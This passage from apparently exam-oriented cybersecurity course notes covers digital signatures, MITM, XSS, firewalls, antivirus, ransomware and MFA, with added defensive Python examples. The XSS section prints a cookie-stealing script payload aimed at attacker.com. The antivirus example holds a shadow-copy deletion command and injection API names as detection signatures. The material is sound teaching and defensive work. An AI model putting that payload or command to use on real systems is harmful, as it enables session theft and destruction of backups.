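TOY_D = pow(TOY_E, -1, (TOY_P - 1) * (TOY_Q - 1))   # modular inverse (Python 3.8+)
TOY_PUBLIC_KEY = (TOY_N, TOY_E)
TOY_PRIVATE_KEY = (TOY_N, TOY_D)


def digest_for_toy_key(document, n):
    """SHA-256 of the document reduced modulo n so it fits the toy modulus; a real scheme
    pads the full digest instead of reducing it."""
    return int.from_bytes(hashlib.sha256(document).digest(), "big") % n


def sign(document, private_key=TOY_PRIVATE_KEY):
    """Signing: hash the document, then apply the private key to the hash."""
    n, d = private_key
    return pow(digest_for_toy_key(document, n), d, n)


def verify(document, signature, public_key=TOY_PUBLIC_KEY):
    """Verification: recover the hash with the public key and compare it with a fresh hash
    of the received document; any modification or a forged signature makes them differ."""
    n, e = public_key
    recovered = pow(signature, e, n)
    return recovered == digest_for_toy_key(document, n)
```

The avalanche check compares the digests of two inputs that differ in a single character: about half of the 256 bits change, which is why a hash of a tampered document never resembles the original hash, and why signing the hash is as good as signing the whole document.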
Properties Provided:
- Authentication: Proves the identity of the signer
- Integrity: Detects any modification to the signed content
- Non-Repudiation: Signer cannot deny having signed the document
Legal Validity: Digital signatures are legally valid under India's IT Act 2000 (Section 3) and Information Technology (Amendment) Act 2008.
Applications of Cryptography
- HTTPS/TLS: Secure web browsing and online transactions
- Email Encryption: S/MIME, PGP for secure email
- VPNs: Encrypted tunnels for secure remote access
- Digital Certificates: PKI for website authentication
- Cryptocurrency: Blockchain uses hash functions and digital signatures
- Disk Encryption: BitLocker, FileVault, VeraCrypt
Key Points for Examination:
- Symmetric encryption uses same key for encryption and decryption (AES, DES)
- Asymmetric encryption uses public-private key pairs (RSA, ECC)
- Hashing is one-way; cannot be reversed (SHA-256, MD5)
- Digital signatures provide authenticity, integrity, and non-repudiation
- AES is the current industry standard for symmetric encryption
- SHA-256 is the recommended hash algorithm; MD5 and SHA-1 are insecure
3.15 Man-in-the-Middle (MITM) Attack
A Man-in-the-Middle (MITM) Attack is a cyberattack where an attacker secretly intercepts and potentially alters communications between two parties who believe they are communicating directly with each other.
How MITM Attacks Work
- Interception: Attacker positions themselves between victim and target (server, website, etc.)
- Eavesdropping: Attacker captures all communications passing through
- Modification (Optional): Attacker can alter messages before forwarding
- Relay: Both parties believe they're communicating directly
Types of MITM Attacks
| Attack Type | Description | Target |
|---|---|---|
| ARP Spoofing (ARP Poisoning) | Attacker sends fake ARP messages on local network, associating their MAC address with legitimate IP addresses | Local Area Networks |
| DNS Spoofing (DNS Cache Poisoning) | Attacker corrupts DNS cache to redirect users to malicious websites | DNS servers, client caches |
| Session Hijacking | Attacker steals session cookies to impersonate authenticated user | Web sessions, authentication |
| SSL Stripping | Attacker downgrades HTTPS connections to HTTP, intercepting unencrypted traffic | HTTPS websites |
| Evil Twin Attack | Attacker creates fake Wi-Fi access point mimicking legitimate network | Wi-Fi users |
| HTTPS Spoofing | Attacker creates fake SSL certificate to impersonate legitimate website | HTTPS connections |
| Email Hijacking | Attacker gains access to email accounts and intercepts/modifies communications | Business email compromise |
Impact of MITM Attacks
- Theft of login credentials and personal information
- Financial fraud through intercepted banking sessions
- Corporate espionage and data theft
- Injection of malware into downloads
- Modification of business communications
Prevention Measures
- Use HTTPS: Always verify the padlock icon and certificate validity
- HSTS (HTTP Strict Transport Security): Forces HTTPS connections
- Certificate Pinning: Applications verify server certificates against known values
- VPN: Encrypts all traffic, preventing eavesdropping
- Strong Wi-Fi Security: Use WPA3, avoid public Wi-Fi for sensitive activities
- Two-Factor Authentication: Limits impact of stolen credentials
- Email Security: Use encrypted email (S/MIME, PGP)
- Network Security: Implement ARP spoofing detection, use static ARP entries
Key Points for Examination:
- MITM attacks intercept communication between two parties
- Common types: ARP spoofing, DNS spoofing, SSL stripping, Evil Twin
- HTTPS with valid certificates prevents most MITM attacks
- Public Wi-Fi is highly vulnerable to Evil Twin attacks
- VPNs provide strong protection by encrypting all traffic
3.16 Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. The injected scripts execute in victims' browsers with the same privileges as legitimate page content.
Types of XSS Attacks
| Type | Description | Persistence |
|---|---|---|
| Stored XSS (Persistent) | Malicious script is permanently stored on target server (database, message board, comment field). All users who view the content are affected. | Permanent - affects multiple users |
| Reflected XSS (Non-Persistent) | Malicious script is embedded in a URL or form input and reflected back by the server in the response. Requires victim to click crafted link. | Temporary - requires user action |
| DOM-Based XSS | Vulnerability exists in client-side JavaScript that writes attacker-controlled data (e.g., from location.hash or the query string) into a dangerous sink such as innerHTML or eval(). The payload may never reach the server, so server-side filtering cannot catch it. | Client-side only |
Impact of XSS Attacks
- Cookie Theft: Steal session cookies to hijack user accounts
- Credential Theft: Display fake login forms to capture passwords
- Malware Distribution: Redirect users to malicious downloads
- Website Defacement: Alter page content seen by users
- Keylogging: Capture keystrokes on the page
- Phishing: Display convincing phishing content within legitimate site
XSS Attack Example
A simple XSS payload in a comment field:
<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
When other users view the comment, their cookies are sent to the attacker.
Prevention Measures
- Input Validation: Validate user input on the server and reject what does not match the expected format (client-side checks improve usability but are trivially bypassed and are not a security control)
- Output Encoding: Encode untrusted data for the context it is inserted into; HTML entity-encode <, >, &, ', " for element content and attributes, and use the appropriate JavaScript, URL, or CSS encoding elsewhere
- Content Security Policy (CSP): HTTP header that restricts where scripts may load from and blocks inline scripts
- HttpOnly Cookies: Prevent JavaScript access to session cookies, so cookie-theft payloads get nothing (the injected script can still act on the user's behalf within the page)
- X-XSS-Protection Header: Legacy browser filter that modern browsers have removed; OWASP recommends setting it to 0 and relying on CSP instead
- Use Security Libraries: OWASP Java Encoder or ESAPI for output encoding; DOMPurify when untrusted HTML must be rendered
- Avoid innerHTML: Use textContent or secure DOM manipulation methods for untrusted data
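The following is an added example, not code from the original text, showing the difference between the vulnerable rendering of the comment payload above and the output-encoded version, why a blocklist filter is not enough, why URL context needs its own handling, and the CSP and HttpOnly headers that back up encoding. The function names, the Python html module, and the sample comment are assumptions chosen for the illustration; a real application would do the same inside its template engine.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed payload: the same comment-field payload shown above.
PAYLOAD = "<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>"


def render_comment_unsafe(author: str, body: str) -> str:
    """Vulnerable: user input is interpolated straight into HTML (stored XSS)."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author: str, body: str) -> str:
    """Hardened: HTML-entity-encode every untrusted value at output time.

    html.escape() turns < > & ' " into entities, so the browser renders the
    payload as text instead of parsing it as a <script> element.
    """
    return f'<div class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'


def naive_blocklist(body: str) -> str:
    """A blocklist 'sanitizer' that strips <script> tags only.

    Included to show why input filtering is not a substitute for output
    encoding: an event-handler payload never contains the word 'script'.
    """
    return re.sub(r"<script\b.*?</script>", "", body, flags=re.IGNORECASE | re.DOTALL)


def safe_href(url: str) -> str:
    """URL context needs more than entity encoding.

    Entity-encoding 'javascript:alert(1)' still leaves a working javascript:
    URL, so links are restricted to http/https and then attribute-encoded.
    """
    cleaned = url.strip()
    if urlsplit(cleaned).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(cleaned, quote=True)


def security_headers(session_id: str) -> dict:
    """Defence in depth: a restrictive CSP plus an HttpOnly session cookie.

    Even if encoding is missed somewhere, inline scripts are blocked by CSP
    and document.cookie cannot read the session cookie.
    """
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/",
        # Legacy filter explicitly disabled; CSP is the real control.
        "X-XSS-Protection": "0",
    }


if __name__ == "__main__":
    print(render_comment_unsafe("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(naive_blocklist('<img src=x onerror="alert(document.cookie)">'))
    print(safe_href("javascript:alert(1)"), safe_href('https://example.com/?q="x"'))
```

The encoded comment displays the payload literally on the page, the blocklist passes the img/onerror payload through untouched, and the javascript: link is neutralised only because the scheme is checked, not because of entity encoding.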
Key Points for Examination:
- XSS allows injection of malicious scripts into web pages
- Three types: Stored (persistent), Reflected (non-persistent), DOM-based
- Mainly used to steal session cookies and credentials
- Prevention: Input validation, output encoding, CSP, HttpOnly cookies
- XSS is listed in the OWASP Top 10 (under Injection, A03, in the 2021 edition)
3.17 Firewall
A Firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. It establishes a barrier between a trusted internal network and untrusted external networks (like the Internet).
Functions of a Firewall:
- Packet Filtering: Examines packets and allows/blocks based on rules
- Access Control: Blocks unauthorized access to network resources
- Traffic Monitoring: Logs network activity for analysis
- NAT (Network Address Translation): Hides internal IP addresses from external network
- VPN Support: May facilitate secure remote connections
Types of Firewalls
| Type | OSI Layer | Description | Limitations |
|---|---|---|---|
| Packet Filtering Firewall | Layer 3-4 | Examines packet headers (IP addresses, ports, protocols) and applies rules | Cannot inspect packet content; vulnerable to IP spoofing |
| Stateful Inspection Firewall | Layer 3-4 | Tracks state of active connections and makes decisions based on context | Resource-intensive; still limited application-layer visibility |
| Application Layer Firewall (Proxy) | Layer 7 | Acts as intermediary; inspects application-layer content (HTTP, FTP, etc.) | Slower performance; may not support all protocols |
| Next-Generation Firewall (NGFW) | Layer 3-7 | Combines traditional firewall with IPS, deep packet inspection, application awareness, SSL inspection | Complex to configure; expensive |
| Hardware Firewall | Variable | Dedicated physical device protecting entire network | Cost; requires physical installation |
| Software Firewall | Variable | Application installed on individual devices | Consumes system resources; per-device management |
Firewall Rule Components
- Source IP Address: Where the traffic originates
- Destination IP Address: Where the traffic is going
- Port Number: Service port (e.g., 80 for HTTP, 443 for HTTPS)
- Protocol: TCP, UDP, ICMP, etc.
- Action: ALLOW, DENY (reject; the sender is told), DROP (silently discard), or LOG
- Direction: Inbound or Outbound
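As an added example (not from the original text), the rule components above can be turned into a small first-match rule engine. It evaluates the same constructed packet stream with a pure packet filter and with a stateful version that keeps a connection table, which is the difference between the first two rows of the types table: the reply to an outbound HTTPS connection is denied by the stateless filter but admitted as ESTABLISHED by the stateful one. The policy, addresses, and class names are assumptions made for the illustration.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class Packet:
    direction: str   # "in" (from the Internet) or "out" (from the LAN)
    proto: str       # "tcp", "udp" or "icmp"
    src: str
    sport: int
    dst: str
    dport: int


@dataclass(frozen=True)
class Rule:
    action: str                               # ALLOW, DENY (reject) or DROP (silent)
    direction: str                            # "in", "out" or "any"
    proto: str                                # "tcp", "udp", "icmp" or "any"
    src: str                                  # CIDR; "0.0.0.0/0" means any
    dst: str
    dports: Optional[Tuple[int, ...]] = None  # None means any destination port


def rule_matches(rule: Rule, pkt: Packet) -> bool:
    """Header-only comparison: this is all a packet filter can see."""
    if rule.direction != "any" and rule.direction != pkt.direction:
        return False
    if rule.proto != "any" and rule.proto != pkt.proto:
        return False
    if ipaddress.ip_address(pkt.src) not in ipaddress.ip_network(rule.src):
        return False
    if ipaddress.ip_address(pkt.dst) not in ipaddress.ip_network(rule.dst):
        return False
    if rule.dports is not None and pkt.dport not in rule.dports:
        return False
    return True


def stateless_decision(rules, pkt: Packet, default: str = "DROP") -> str:
    """Packet-filtering firewall: first matching rule wins, else the default."""
    for rule in rules:
        if rule_matches(rule, pkt):
            return rule.action
    return default


class StatefulFirewall:
    """Stateful inspection: replies to permitted connections are admitted from
    a connection table instead of needing their own inbound rule."""

    def __init__(self, rules, default: str = "DROP"):
        self.rules = list(rules)
        self.default = default
        self.connections = set()   # (src, sport, dst, dport, proto) of allowed flows

    def decide(self, pkt: Packet) -> str:
        reply_key = (pkt.dst, pkt.dport, pkt.src, pkt.sport, pkt.proto)
        if reply_key in self.connections:
            return "ALLOW"  # ESTABLISHED: reply to a flow we already permitted
        action = stateless_decision(self.rules, pkt, self.default)
        if action == "ALLOW" and pkt.proto in ("tcp", "udp"):
            self.connections.add((pkt.src, pkt.sport, pkt.dst, pkt.dport, pkt.proto))
        return action


# Constructed policy for a LAN 10.0.0.0/24 with a public web server at 10.0.0.10.
POLICY = [
    Rule("ALLOW", "in",  "tcp", "0.0.0.0/0",   "10.0.0.10/32", (443,)),  # public HTTPS
    Rule("ALLOW", "out", "any", "10.0.0.0/24", "0.0.0.0/0"),              # LAN may go out
    Rule("DENY",  "in",  "any", "0.0.0.0/0",   "10.0.0.0/24"),            # everything else inbound
]

# Constructed packets.
WEB_REQUEST  = Packet("in",  "tcp", "203.0.113.5",  40001, "10.0.0.10",    443)
SSH_PROBE    = Packet("in",  "tcp", "203.0.113.5",  40002, "10.0.0.10",    22)
CLIENT_OUT   = Packet("out", "tcp", "10.0.0.20",    51000, "198.51.100.7", 443)
CLIENT_REPLY = Packet("in",  "tcp", "198.51.100.7", 443,   "10.0.0.20",    51000)
UNSOLICITED  = Packet("in",  "tcp", "198.51.100.7", 443,   "10.0.0.21",    51000)


def compare(pkts):
    """Return {name: (stateless decision, stateful decision)} for one packet stream."""
    fw = StatefulFirewall(POLICY)
    return {name: (stateless_decision(POLICY, p), fw.decide(p)) for name, p in pkts}


if __name__ == "__main__":
    stream = [("web", WEB_REQUEST), ("ssh", SSH_PROBE), ("out", CLIENT_OUT),
              ("reply", CLIENT_REPLY), ("unsolicited", UNSOLICITED)]
    for name, (stateless, stateful) in compare(stream).items():
        print(f"{name:12s} stateless={stateless:5s} stateful={stateful}")
```

Note what neither engine can do: the web request is allowed purely because it is TCP to port 443 on the web server; a malicious HTTPS request looks identical at this layer, which is the application-layer visibility gap the table attributes to both types.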
Examples of Firewall Products
- Enterprise: Cisco ASA, Palo Alto Networks, Fortinet FortiGate, Check Point
- Software/Open source: Windows Defender Firewall, iptables/nftables (Linux), pfSense and OPNsense (open-source firewall distributions)
- Cloud: AWS Security Groups, Azure Firewall, GCP Cloud Firewall
Key Points for Examination:
- Firewall monitors and controls network traffic based on security rules
- Types: Packet filtering, Stateful inspection, Application-layer (Proxy), NGFW
- NGFW combines traditional firewall with IPS, application awareness, and deep packet inspection
- Rules based on: Source/Destination IP, Port, Protocol, Action
- Hardware firewalls protect entire networks; Software firewalls protect individual devices
3.18 Antivirus Software
Antivirus software is a program designed to detect, prevent, and remove malicious software (malware) including viruses, worms, Trojans, spyware, ransomware, and other threats from computer systems.
How Antivirus Software Works
Detection Methods
| Method | Description | Pros/Cons |
|---|---|---|
| Signature-Based Detection | Compares file hashes or byte patterns against a database of known malware signatures | Accurate for known threats; a single changed byte defeats a hash signature, and new (zero-day) malware is missed |
| Heuristic-Based Detection | Analyzes code structure and behavior patterns to identify potentially malicious code | Can detect unknown variants; may produce false positives |
| Behavioral Detection (Sandbox/EDR) | Runs suspicious files in an isolated environment, or monitors process behavior on the host, to observe what the code actually does | Effective against packed and obfuscated malware; slower, and sandbox-aware malware may stay dormant |
| Cloud-Based Detection | Sends suspicious file hash to cloud for analysis against latest threat data | Access to real-time threat intelligence; requires internet connection |
| Machine Learning/AI Detection | Uses ML models trained on malware samples to identify new threats | Can detect novel malware; requires significant training data |
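An added illustration of the first two rows of the table, not code from the original text and not a real antivirus engine: a scanner that tries an exact hash signature, then a byte-pattern signature, then a simple entropy-plus-strings heuristic. The samples are constructed harmless byte strings standing in for files, the hash database is computed at run time from them, and the threshold and indicator strings are assumptions for the illustration.

```python
import hashlib
import math
from collections import Counter

# --- Constructed samples (harmless byte strings standing in for files) ---
KNOWN_SAMPLE = (b"MZ\x90\x00DEMO-SAMPLE-v1\x00"
                b"cmd.exe /c vssadmin delete shadows /all /quiet\x00"
                b"ransom_note.txt\x00")
VARIANT = KNOWN_SAMPLE.replace(b"v1", b"v2")                  # one byte changed
_obfuscated = bytes(b ^ 0x5A for b in b"vssadmin delete shadows")
EVASIVE = KNOWN_SAMPLE.replace(b"vssadmin delete shadows", _obfuscated)  # string XOR-encoded
BENIGN_DOC = b"Quarterly report: revenue grew 4% year over year. " * 20
PACKED_BLOB = bytes(range(256)) * 4                           # uniform bytes, looks packed
PACKED_INJECTOR = PACKED_BLOB + b"VirtualAllocEx\x00WriteProcessMemory\x00"

# --- Signature database (hashes computed here, so nothing is fabricated) ---
HASH_SIGNATURES = {hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "Demo.Ransom.A"}
PATTERN_SIGNATURES = [
    (b"vssadmin delete shadows", "Generic.ShadowCopyDeletion"),
]
SUSPICIOUS_STRINGS = [b"VirtualAllocEx", b"WriteProcessMemory",
                      b"CreateRemoteThread", b"-EncodedCommand"]
HEURISTIC_THRESHOLD = 3   # assumed cut-off; lower means more false positives


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; packed or encrypted content approaches 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def heuristic_score(data: bytes):
    """Static heuristics: high entropy plus process-injection API names."""
    score, reasons = 0, []
    if shannon_entropy(data) > 7.2:
        score += 2
        reasons.append("high-entropy")
    for s in SUSPICIOUS_STRINGS:
        if s in data:
            score += 1
            reasons.append(s.decode())
    return score, reasons


def scan(data: bytes):
    """Return (verdict, name, method); cheapest method is tried first."""
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_SIGNATURES:
        return ("malicious", HASH_SIGNATURES[digest], "hash")
    for pattern, name in PATTERN_SIGNATURES:
        if pattern in data:
            return ("malicious", name, "pattern")
    score, reasons = heuristic_score(data)
    if score >= HEURISTIC_THRESHOLD:
        return ("suspicious", "Heuristic." + "+".join(reasons), "heuristic")
    return ("clean", None, None)


if __name__ == "__main__":
    for label, sample in [("known", KNOWN_SAMPLE), ("variant", VARIANT),
                          ("evasive", EVASIVE), ("benign", BENIGN_DOC),
                          ("packed", PACKED_BLOB), ("injector", PACKED_INJECTOR)]:
        print(f"{label:9s} {scan(sample)}")
```

The variant shows why hash signatures alone are brittle (one byte changes the SHA-256, the byte pattern still hits), the XOR-obfuscated copy slips past both static signatures and comes back clean, which is the gap behavioral and sandbox detection exist to close, and the packed blob on its own stays below the heuristic threshold because legitimate compressed or encrypted files look the same, the false-positive trade-off the table mentions.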
Antivirus Operations
- Real-Time (On-Access) Scanning: Monitors files as they are opened, downloaded, or executed
- On-Demand Scanning: User-initiated full or partial system scan
- Scheduled Scanning: Automatic scans at configured intervals
- Email Scanning: Scans email attachments for threats
- Download Scanning: Scans files as they are downloaded from internet
Response Actions
- Quarantine: Isolates infected file to prevent execution while preserving it for analysis
- Delete: Permanently removes the malicious file
- Disinfect/Clean: Attempts to remove malicious code while preserving original file
- Block: Prevents execution or access to suspicious file
- Alert: Notifies user of potential threat for manual decision
Limitations of Antivirus
- Cannot detect zero-day malware if using only signature-based detection
- May impact system performance during scans
- Requires regular updates to remain effective
- Cannot protect against all social engineering attacks
- May produce false positives (flagging legitimate software)
- Advanced malware may disable or evade antivirus
Antivirus Software Examples
- Free: Microsoft Defender (built into Windows), Avast Free, AVG Free, Bitdefender Free
- Paid: Norton, Kaspersky, Bitdefender, McAfee, ESET
- Enterprise: CrowdStrike, Symantec Endpoint Protection, Sophos
Key Points for Examination:
- Antivirus detects, prevents, and removes malware from systems
- Detection methods: Signature-based, Heuristic, Behavioral, Cloud-based, AI/ML
- Signature-based detection cannot detect zero-day (new) malware
- Operations: Real-time scanning, on-demand scanning, email scanning
- Response actions: Quarantine, Delete, Disinfect, Block
- Regular signature updates are essential for effectiveness
3.19 Ransomware
Ransomware is a type of malicious software that encrypts the victim's files or locks them out of their system, demanding a ransom payment (usually in cryptocurrency) to restore access.
Types of Ransomware
| Type | Description | Impact |
|---|---|---|
| Crypto Ransomware (Encrypting) | Encrypts files using strong encryption algorithms | Files inaccessible without decryption key |
| Locker Ransomware | Locks user out of operating system/device | Cannot access system but files may not be encrypted |
| Scareware | Displays fake warnings claiming system is infected | Demands payment for fake "cleaning" software |
| Doxware (Leakware) | Steals data and threatens to publish it if the ransom is not paid | Often combined with encryption (double extortion), so backups alone do not remove the attacker's leverage |
| RaaS (Ransomware-as-a-Service) | Criminal model where developers sell/rent ransomware to affiliates | Enables non-technical criminals to launch attacks |
Ransomware Distribution Methods
- Phishing Emails: Malicious attachments or links in emails
- Malicious Downloads: Infected software or drive-by downloads
- RDP Exploitation: Compromising exposed Remote Desktop Protocol
- Exploitation Kits: Automated tools exploiting software vulnerabilities
- Malvertising: Malicious advertisements on legitimate websites
- USB Drives: Infected removable media
Notable Ransomware Attacks
- WannaCry (2017): Affected 200,000+ computers in 150 countries; self-propagated through the Windows SMBv1 vulnerability patched in MS17-010 (EternalBlue)
- NotPetya (2017): Disguised as ransomware but designed for destruction (victims could not be given a working key); estimated $10 billion in damages
- REvil/Sodinokibi: Major RaaS operation; $70 million demand after the 2021 Kaseya supply-chain attack
- Conti: Targeted hospitals, schools, government; its internal chats and tooling were leaked in 2022
- LockBit: Long-running RaaS known for fast encryption; its infrastructure was seized in a 2024 law enforcement operation, although affiliates continued attacks
Prevention Measures
- Regular Backups: Maintain offline or immutable, tested backups (3-2-1 rule: 3 copies, 2 media types, 1 offsite); ransomware deliberately seeks out and encrypts or deletes any backups it can reach
- Email Security: Filter malicious attachments and links
- Patch Management: Keep systems and software updated
- User Training: Educate users on phishing and safe practices
- Network Segmentation: Limit lateral movement if infected
- Endpoint Protection: Use modern EDR with ransomware detection
- Disable RDP: Or use VPN and strong authentication for remote access
- Application Whitelisting: Allow only approved software to run
Response to Ransomware Attack
- Isolate: Disconnect infected systems from network immediately
- Identify: Determine ransomware variant (may help find decryptors)
- Report: Notify law enforcement and relevant authorities
- Do NOT Pay: Payment doesn't guarantee recovery and funds criminal activity
- Restore: Recover from clean backups after cleaning system
- Investigate: Determine root cause to prevent recurrence
Key Points for Examination:
- Ransomware encrypts files and demands payment for decryption
- Types: Crypto ransomware, Locker ransomware, Doxware, RaaS
- Spread through: Phishing, malicious downloads, RDP exploitation
- Notable examples: WannaCry, NotPetya, REvil, LockBit
- Prevention: Backups, patching, user training, endpoint protection
- Never pay ransom - it doesn't guarantee recovery
3.20 Multi-Factor Authentication (MFA)
Multi-Factor Authentication (MFA) is a security mechanism that requires users to provide two or more verification factors to gain access to an account, application, or system. It adds layers of security beyond just a password.
The Three Authentication Factors
| Factor | Description | Examples |
|---|---|---|
| Something You Know | Knowledge-based credentials that only the user should know | Password, PIN, security questions |
| Something You Have | Physical items in the user's possession | Mobile phone (OTP), hardware token (YubiKey), smart card |
| Something You Are | Biometric characteristics unique to the user | Fingerprint, face recognition, iris scan, voice |
Additional Factors (Context-Based)
- Somewhere You Are (Location): GPS location, IP address geolocation
- Something You Do (Behavior): Typing patterns, device usage patterns
Common MFA Methods
| Method | How It Works | Security Level |
|---|---|---|
| SMS OTP | One-time code sent via text message | Low - vulnerable to SIM swapping and interception |
| Email OTP | One-time code sent to email | Low - depends on email account security |
| Authenticator Apps | Time-based OTP (TOTP) generated from a shared secret by apps like Google Authenticator, Microsoft Authenticator, Authy | Medium-High - codes are generated locally, but can be phished and relayed in real time |
| Push Notifications | App sends approval request to registered device | High - easy to use, but vulnerable to push fatigue (MFA bombing) unless number matching is enabled |
| Hardware Security Keys | Physical devices using FIDO2/WebAuthn standards (YubiKey, Titan) | Very High - phishing-resistant, because the signed challenge is bound to the genuine site's origin |
| Biometric | Fingerprint, face, or iris recognition | High - unique to the individual; normally unlocks a device-bound key rather than being sent to the server, since a biometric cannot be changed if it leaks |
Benefits of MFA
- Significantly reduces account compromise risk (Microsoft reports that MFA blocks over 99.9% of automated account attacks)
- Protects against password-based attacks (phishing, brute force, credential stuffing)
- Provides layered security - single factor compromise doesn't grant access
- Meets compliance requirements (PCI DSS mandates MFA for access to the cardholder data environment; HIPAA and GDPR expect appropriate technical safeguards, for which MFA is the accepted baseline)
MFA Implementation Considerations
- User Experience: Balance security with convenience
- Recovery Options: Plan for lost devices (backup codes, recovery methods)
- Risk-Based MFA: Require additional factors only for suspicious activities
- Avoid SMS: Use authenticator apps or hardware keys for higher security
Key Points for Examination:
- MFA requires two or more authentication factors from different categories
- Three factors: Something you know, have, and are
- SMS OTP is vulnerable to SIM swapping - authenticator apps are more secure
- Hardware security keys (FIDO2) provide the strongest protection
- MFA blocks the large majority (Microsoft: over 99.9%) of automated account compromise attempts
- Required by many compliance frameworks (PCI-DSS, HIPAA)
Unit III Summary
- Proxy servers act as intermediaries, with types including transparent, anonymous, and elite proxies; VPNs and Tor provide enhanced anonymity.
- Phishing uses fraudulent communications to steal data, with variants including spear phishing, whaling, vishing, and smishing.
- Password cracking techniques include brute force, dictionary attacks, and rainbow tables; defenses include salting and key stretching.
- Keyloggers capture keystrokes while spyware monitors broader system activity for malicious purposes.
- Malware types include viruses (require host), worms (self-propagating), Trojans (disguised), and ransomware (encryption-based extortion).
- Steganography hides messages within media files, distinct from cryptography which makes content unreadable.
- DoS/DDoS attacks overwhelm targets with traffic; DDoS uses distributed botnets for greater impact.
- SQL injection exploits improper input handling; prevention requires parameterized queries and input validation.
- Buffer overflow exploits memory handling flaws to execute arbitrary code.
- Wireless attacks include rogue APs, evil twins, and deauthentication attacks; WPA3 provides strongest protection.
- Identity theft involves using stolen personal information for fraud, with phishing being the primary acquisition method.